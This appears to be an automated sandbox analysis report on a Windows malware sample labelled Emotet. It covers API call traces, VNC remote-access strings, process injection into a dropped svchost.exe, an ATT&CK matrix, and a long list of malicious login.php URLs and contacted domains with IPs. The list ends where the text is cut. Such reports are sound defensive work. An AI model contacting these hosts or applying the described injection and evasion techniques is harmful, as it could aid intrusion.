Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,1_2_00402360
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,1_2_00403A20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F6970 memset,GetProcessHeap,HeapAlloc,memset,GetTimeZoneInformation,Sleep,#680,GetTickCount,_snprintf,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,SetFileAttributesA,DeleteFileA,Sleep,Sleep,22_2_012F6970
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeCode function: 1_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,1_2_004034C0
Source: Z8eHwAvqAh.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality

barindex
Contains VNC / remote desktop functionality (version string found)
Source: Z8eHwAvqAh.exeString found in binary or memory: RFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: Z8eHwAvqAh.exe, 00000001.00000003.1299697107.0000000000618000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.2085406801.0000000003EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: svchost.exe, 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: svchost.exe, 00000002.00000003.1318599040.0000000000884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000002.2103444629.0000000001280000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2108549268.0000000001590000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000002.2107924454.0000000001530000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110291091.0000000000AE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2110131950.0000000000A40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2114094009.00000000012A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000002.2113959857.0000000001200000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117128490.00000000010B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000002.2117328795.0000000001110000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exeString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122586333.00000000012F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2122526350.0000000001290000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2132206757.00000000020D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130828289.00000000006A0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136733036.0000000000AE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2136949497.0000000000B40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141769100.0000000000F30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
Source: swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2141687377.0000000000ED0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01311250 htons,socket,setsockopt,closesocket,bind,listen,22_2_01311250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01310480 setsockopt,htons,socket,setsockopt,bind,22_2_01310480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012F9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,22_2_012F9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015C1250 htons,socket,setsockopt,closesocket,bind,listen,25_2_015C1250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015C0480 setsockopt,htons,socket,setsockopt,bind,25_2_015C0480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015A9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,25_2_015A9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B11250 htons,socket,setsockopt,closesocket,bind,listen,27_2_00B11250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B10480 setsockopt,htons,socket,setsockopt,bind,27_2_00B10480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AF9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,27_2_00AF9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012D1250 htons,socket,setsockopt,closesocket,bind,listen,29_2_012D1250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012D0480 setsockopt,htons,socket,setsockopt,bind,29_2_012D0480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012B9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,29_2_012B9E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01141250 htons,socket,setsockopt,closesocket,bind,listen,31_2_01141250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01140480 setsockopt,htons,socket,setsockopt,bind,31_2_01140480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01129E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,31_2_01129E40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01321250 htons,socket,setsockopt,closesocket,bind,listen,33_2_01321250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01320480 setsockopt,htons,socket,setsockopt,bind,33_2_01320480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01309E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,33_2_01309E40

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Valid Accounts		22
Native API		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		111
Input Capture		2
System Time Discovery		1
Remote Desktop Protocol		1
Archive Collected Data		4
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
Create Account		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		LSASS Memory11
Account Discovery		Remote Desktop Protocol1
Screen Capture		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		1
Valid Accounts		1
Valid Accounts		1
Obfuscated Files or Information		Security Account Manager1
System Network Connections Discovery		SMB/Windows Admin Shares111
Input Capture		11
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Scheduled Task/Job		11
Access Token Manipulation		31
Software Packing		NTDS2
File and Directory Discovery		Distributed Component Object Model2
Clipboard Data		1
Remote Access Software		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd1
Registry Run Keys / Startup Folder		613
Process Injection		1
DLL Side-Loading		LSA Secrets143
System Information Discovery		SSHKeylogging3
Non-Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Bootkit		1
Scheduled Task/Job		322
Masquerading		Cached Domain Credentials1
Query Registry		VNCGUI Input Capture14
Application Layer Protocol		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
Registry Run Keys / Startup Folder		1
Valid Accounts		DCSync351
Security Software Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
Virtualization/Sandbox Evasion		Proc Filesystem151
Virtualization/Sandbox Evasion		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
Access Token Manipulation		/etc/passwd and /etc/shadow13
Process Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
Process Injection		Network Sniffing11
Application Window Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
Bootkit		Input Capture1
System Owner/User Discovery		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553825 Sample: Z8eHwAvqAh.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 38 vowyzuf.com 2->38 40 vowymom.com 2->40 42 1002 other IPs or domains 2->42 56 Suricata IDS alerts for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 19 other signatures 2->62 9 Z8eHwAvqAh.exe 2 3 2->9         started        signatures3 process4 file5 34 C:\Windows\apppatch\svchost.exe, PE32 9->34 dropped 36 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->36 dropped 64 Detected unpacking (changes PE section rights) 9->64 66 Detected unpacking (overwrites its own PE header) 9->66 68 Moves itself to temp directory 9->68 70 8 other signatures 9->70 13 svchost.exe 1 80 9->13         started        signatures6 process7 dnsIp8 44 vocypyt.com 13->44 46 pujycyp.com 13->46 48 23 other IPs or domains 13->48 72 Antivirus detection for dropped file 13->72 74 System process connects to network (likely due to code injection or exploit) 13->74 76 Creates an undocumented autostart registry key 13->76 78 7 other signatures 13->78 17 swvGCAxOMikYQeoQzimiprVu.exe 13->17 injected 20 swvGCAxOMikYQeoQzimiprVu.exe 13->20 injected 22 swvGCAxOMikYQeoQzimiprVu.exe 13->22 injected 24 10 other processes 13->24 signatures9 process10 signatures11 50 Monitors registry run keys for changes 17->50 52 Contains VNC / remote desktop functionality (version string found) 17->52 54 Found direct / indirect Syscall (likely to bypass EDR) 17->54 26 WerFault.exe 21 24->26         started        28 WerFault.exe 16 24->28         started        30 WerFault.exe 24->30         started        32 WerFault.exe 24->32         started        process12

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Z8eHwAvqAh.exe84%ReversingLabsWin32.Trojan.Emotet
Z8eHwAvqAh.exe100%AviraTR/Crypt.XPACK.Gen
Z8eHwAvqAh.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Windows\apppatch\svchost.exe100%AviraTR/Crypt.XPACK.Gen
C:\Windows\apppatch\svchost.exe100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://ganyhab.com/100%Avira URL Cloudmalware
http://volyjym.com/login.php100%Avira URL Cloudmalware
http://lyvytan.com/login.php9100%Avira URL Cloudmalware
http://pupymol.com/login.php100%Avira URL Cloudmalware
http://vonymoc.com/100%Avira URL Cloudmalware
http://vopycoc.com/login.php100%Avira URL Cloudmalware
http://vofybic.com/login.php100%Avira URL Cloudmalware
http://ww16.vofycot.com/login.php?sub1=20241112-0425-1706-a2c8-02526792f211100%Avira URL Cloudmalware
http://lysyfed.com/login.php100%Avira URL Cloudmalware
http://qekynog.com/login.php100%Avira URL Cloudphishing
http://puvybeg.com/H100%Avira URL Cloudmalware
http://vopydum.com/100%Avira URL Cloudphishing
http://vocyjet.com/login.php100%Avira URL Cloudmalware
http://lyryxen.com/login.php100%Avira URL Cloudmalware
http://vofymif.com/login.php100%Avira URL Cloudmalware
http://qegyvuq.com/login.php100%Avira URL Cloudphishing
http://vowyrif.com/login.php100%Avira URL Cloudmalware
http://purymog.com/100%Avira URL Cloudmalware
http://vojyjyc.com/login.php100%Avira URL Cloudphishing
http://galyvuz.com/login.php100%Avira URL Cloudmalware
http://qexynyq.com/login.php100%Avira URL Cloudmalware
http://lysyvax.com/login.php100%Avira URL Cloudmalware
http://galydyw.com/100%Avira URL Cloudmalware
http://vocygim.com/100%Avira URL Cloudmalware
http://vofyqek.com/0;100%Avira URL Cloudmalware
http://qekyhil.com/login.php100%Avira URL Cloudmalware
http://qebyqeq.com/login.php100%Avira URL Cloudmalware
http://gatyniz.com/100%Avira URL Cloudmalware
http://pujylyv.com/100%Avira URL Cloudmalware
http://pupyguq.com/login.php100%Avira URL Cloudmalware
http://puvyxig.com/login.phpg100%Avira URL Cloudmalware
http://qetykyq.com/login.php100%Avira URL Cloudmalware
http://lygysij.com/100%Avira URL Cloudmalware
http://volydyk.com/100%Avira URL Cloudmalware
http://lysytoj.com/login.php100%Avira URL Cloudmalware
http://vojyduf.com/login.php100%Avira URL Cloudmalware
http://pupycuv.com/login.php100%Avira URL Cloudmalware
http://puvydyp.com/100%Avira URL Cloudmalware
http://qetyvil.com/login.php100%Avira URL Cloudmalware
http://vofypam.com/login.php100%Avira URL Cloudmalware
http://lygyvuj.com/login.php100%Avira URL Cloudphishing
https://puzylyp.com/login.php100%Avira URL Cloudmalware
http://lysynaj.com/login.php100%Avira URL Cloudmalware
http://puzybil.com/login.php0%Avira URL Cloudsafe
http://vojybim.com/login.php100%Avira URL Cloudphishing
http://puvypoq.com/0%Avira URL Cloudsafe
http://puzylyp.com/H100%Avira URL Cloudmalware
http://qekynuq.com/http://vopypif.com/100%Avira URL Cloudmalware
http://lysyxar.com/login.php100%Avira URL Cloudmalware
http://qetylyv.com/100%Avira URL Cloudphishing
http://galyhib.com/login.php100%Avira URL Cloudmalware
http://lyxygax.com/login.php100%Avira URL Cloudmalware
http://vopykum.com/login.php100%Avira URL Cloudmalware
http://pumytup.com/login.php100%Avira URL Cloudmalware
http://ganynos.com/100%Avira URL Cloudmalware
http://puzypav.com/100%Avira URL Cloudmalware
http://lymywaj.com/login.php100%Avira URL Cloudmalware
http://qexyreg.com/login.php100%Avira URL Cloudmalware
http://qetyveq.com/login.php100%Avira URL Cloudmalware
http://galyqoh.com/login.php100%Avira URL Cloudmalware
http://volyjok.com/H100%Avira URL Cloudmalware
http://vonypic.com/login.php100%Avira URL Cloudmalware
http://puzyduq.com/login.php100%Avira URL Cloudmalware
http://gahyvuh.com/login.php100%Avira URL Cloudmalware
http://pumybuq.com/0%Avira URL Cloudsafe
http://puzydal.com/login.php100%Avira URL Cloudmalware
http://lyxysad.com/login.php100%Avira URL Cloudmalware
http://pujyjol.com/login.php100%Avira URL Cloudphishing
http://vowyqik.com/login.phpcom/login.php100%Avira URL Cloudmalware
http://vowyqyt.com/H100%Avira URL Cloudmalware
http://gahyhys.com/login.php100%Avira URL Cloudmalware
http://purywyl.com/login.php100%Avira URL Cloudmalware
https://qegyhig.com/wp-json/100%Avira URL Cloudmalware
http://puryxag.com/login.php100%Avira URL Cloudmalware
http://lykyjad.com/login.php100%Avira URL Cloudmalware
http://vopymyc.com/login.php100%Avira URL Cloudmalware
http://vojycec.com/login.php100%Avira URL Cloudmalware
http://gatyhos.com/100%Avira URL Cloudmalware
http://qegytyv.com/login.php100%Avira URL Cloudmalware
http://gadyzib.com/100%Avira URL Cloudmalware
http://lyryman.com/100%Avira URL Cloudmalware
http://vojycec.com/100%Avira URL Cloudmalware
http://lykyjux.com/0%Avira URL Cloudsafe
http://lyryvur.com/login.php100%Avira URL Cloudmalware
http://qedyxel.com/login.php100%Avira URL Cloudphishing
http://pujygug.com/login.php100%Avira URL Cloudmalware
http://vonydem.com/100%Avira URL Cloudmalware
http://lysyvan.com/login.php100%Avira URL Cloudmalware
http://lyvyxyj.com/login.php100%Avira URL Cloudmalware
http://lysysyx.com/login.php100%Avira URL Cloudmalware
http://lygyged.com/login.php100%Avira URL Cloudmalware
http://vopycyf.com/login.php100%Avira URL Cloudphishing
http://ganyvyw.com/login.php100%Avira URL Cloudmalware
http://lysysir.com/login.php100%Avira URL Cloudmalware
http://pumydyg.com/login.php100%Avira URL Cloudmalware
http://gatyruw.com/H100%Avira URL Cloudmalware
http://lymyjon.com/login.php100%Avira URL Cloudmalware
http://volykit.com/login.php100%Avira URL Cloudphishing
http://lyryjej.com/login.php100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pupydeq.com
13.248.169.48
truefalse
    		high
    pupycag.com
    		18.208.156.248
    		truefalse
      		high
      lyvyxor.com
      		208.100.26.245
      		truefalse
        		high
        77026.bodis.com
        		199.59.243.227
        		truefalse
          		high
          lysyvan.com
          		188.114.97.3
          		truefalse
            		high
            galynuh.com
            		64.225.91.73
            		truefalse
              		high
              qegyhig.com
              		188.114.96.3
              		truefalse
                		high
                gatyfus.com
                		178.162.203.202
                		truefalse
                  		high
                  vonypom.com
                  		18.208.156.248
                  		truefalse
                    		high
                    puzylyp.com
                    		99.83.170.3
                    		truefalse
                      		high
                      qexyhuv.com
                      		76.223.67.189
                      		truefalse
                        		high
                        77980.bodis.com
                        		199.59.243.227
                        		truefalse
                          		high
                          pltraffic7.com
                          		72.52.179.174
                          		truefalse
                            		high
                            gadyciz.com
                            		44.221.84.105
                            		truefalse
                              		high
                              gadyniw.com
                              		154.212.231.82
                              		truefalse
                                		high
                                lyxynyx.com
                                		103.224.212.210
                                		truefalse
                                  		high
                                  www.sedoparking.com
                                  		64.190.63.136
                                  		truefalse
                                    		high
                                    lygyvuj.com
                                    		52.34.198.229
                                    		truefalse
                                      		high
                                      lygynud.com
                                      		3.94.10.34
                                      		truefalse
                                        		high
                                        gahyqah.com
                                        		23.253.46.64
                                        		truefalse
                                          		high
                                          vocyzit.com
                                          		44.221.84.105
                                          		truefalse
                                            		high
                                            galyqaz.com
                                            		199.191.50.83
                                            		truefalse
                                              		high
                                              vofycot.com
                                              		103.224.182.252
                                              		truefalse
                                                		high
                                                qetyhyg.com
                                                		64.225.91.73
                                                		truefalse
                                                  		high
                                                  gahyhiz.com
                                                  		44.221.84.105
                                                  		truefalse
                                                    		high
                                                    qetyfuv.com
                                                    		44.221.84.105
                                                    		truefalse
                                                      		high
                                                      gtm-sg-6l13ukk0m05.qu200.com
                                                      		103.150.10.48
                                                      		truetrue
                                                        		unknown
                                                        lymyxid.com
                                                        		3.94.10.34
                                                        		truefalse
                                                          		high
                                                          qegyval.com
                                                          		154.85.183.50
